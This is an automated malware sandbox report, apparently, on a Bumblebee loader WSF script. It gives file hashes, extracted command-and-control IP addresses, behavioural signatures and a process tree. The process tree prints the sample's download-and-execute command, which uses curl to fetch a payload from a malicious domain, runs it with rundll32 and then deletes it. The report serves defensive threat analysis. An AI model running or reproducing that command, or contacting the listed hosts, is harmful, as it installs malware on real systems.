Analysis
-
max time kernel
144s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
22-04-2023 01:27
Static task
static1
Behavioral task
behavioral1
Sample
5b7dfd88fcbbbb7e3d1b4b6606c4fdd10397dd5c00e18cfe83cd9a94ed136246.wsf
Resource
win7-20230220-en
General
-
Target
5b7dfd88fcbbbb7e3d1b4b6606c4fdd10397dd5c00e18cfe83cd9a94ed136246.wsf
-
Size
178KB
-
MD5
518fc2e647ec1a068d96699a7c81f09f
-
SHA1
2f1852128b1797ecb20557109c503197992d5ff7
-
SHA256
5b7dfd88fcbbbb7e3d1b4b6606c4fdd10397dd5c00e18cfe83cd9a94ed136246
-
SHA512
2bf8fe6ac6316b64ba2f57ca9e6bdc922913d07b5a2cd9efeae453feb2ac7bc9e621b706ca245673a9b2d73d437592b9f2cedf78e5370db8f3dc8e6afbf3ee76
-
SSDEEP
3072:1eULHHO+zbe2qOX/w+A429OutoWjVM8kgCRreRlW+Q5HUJAWo5hiaPJhO5Q51lJO:Y8SOXY7txjVM8kgUeRlW+FAWo5AaPjCb
Malware Config
Extracted
bumblebee
mc1904
146.70.155.82:443
149.3.170.179:443
103.175.16.150:443
Signatures
-
Blocklisted process makes network request 8 IoCs
flow pid Process 5 2320 WScript.exe 18 4600 rundll32.exe 26 4600 rundll32.exe 42 4600 rundll32.exe 51 4600 rundll32.exe 52 4600 rundll32.exe 54 4600 rundll32.exe 55 4600 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation WScript.exe -
Loads dropped DLL 1 IoCs
pid Process 4600 rundll32.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4600 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 5 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2320 wrote to memory of 1740 2320 WScript.exe 83 PID 2320 wrote to memory of 1740 2320 WScript.exe 83 PID 1740 wrote to memory of 4524 1740 cmd.exe 85 PID 1740 wrote to memory of 4524 1740 cmd.exe 85 PID 1740 wrote to memory of 4600 1740 cmd.exe 86 PID 1740 wrote to memory of 4600 1740 cmd.exe 86
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b7dfd88fcbbbb7e3d1b4b6606c4fdd10397dd5c00e18cfe83cd9a94ed136246.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -s --ssl-no-revoke --fail https://biznessfarm.buzz/mmm2/35EgZAl0ndLtSyB2PtEHMDZXsGF5DVRqOA~~/YgYONy1gmOyI6qASimiMJAPaZfRGBQVArw~~/ --output cjaelvdb.yaq && if exist cjaelvdb.yaq rundll32 cjaelvdb.yaq,bYXjdERymsFY && del cjaelvdb.yaq2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\system32\curl.execurl -s --ssl-no-revoke --fail https://biznessfarm.buzz/mmm2/35EgZAl0ndLtSyB2PtEHMDZXsGF5DVRqOA~~/YgYONy1gmOyI6qASimiMJAPaZfRGBQVArw~~/ --output cjaelvdb.yaq3⤵PID:4524
-
-
C:\Windows\system32\rundll32.exerundll32 cjaelvdb.yaq,bYXjdERymsFY3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:4600
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD52f7cc32eab5132846f2c60cd49b11503
SHA1a3bd016dd1d2f26857594d4d60f36bc73e9ede99
SHA256187754f20558b7d67abb233e84ee14a85ea1791983d87d5a4dfe062799ae3d3c
SHA5122ad2ca1341a5603c76ee0137d88b7134aec944333c41b0aca3af3ca3415e65127225c6b1753d11bf0a1d3b570e00fa6ebb95824f09e048d13d45dfae0ef8e433
-
Filesize
1.4MB
MD52f7cc32eab5132846f2c60cd49b11503
SHA1a3bd016dd1d2f26857594d4d60f36bc73e9ede99
SHA256187754f20558b7d67abb233e84ee14a85ea1791983d87d5a4dfe062799ae3d3c
SHA5122ad2ca1341a5603c76ee0137d88b7134aec944333c41b0aca3af3ca3415e65127225c6b1753d11bf0a1d3b570e00fa6ebb95824f09e048d13d45dfae0ef8e433